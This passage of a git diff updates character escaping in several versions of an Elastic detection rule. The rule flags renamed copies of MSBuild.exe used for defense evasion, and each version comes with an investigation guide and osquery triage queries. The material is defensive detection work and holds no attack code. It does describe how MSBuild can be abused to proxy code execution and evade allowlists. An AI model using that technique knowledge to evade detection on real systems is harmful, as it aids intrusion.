SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json
index 7f33418e275..30db2196cc9 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_105.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json
index a6622a8cae0..90724bfc5fb 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_106.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json
index 471b0c82083..178b627e906 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_107.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", "related_integrations": [ { 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 21,
 "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json
index 29837e8a847..d433fe4eba1 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_108.json
@@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Build Engine Using an Alternate Name", - "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
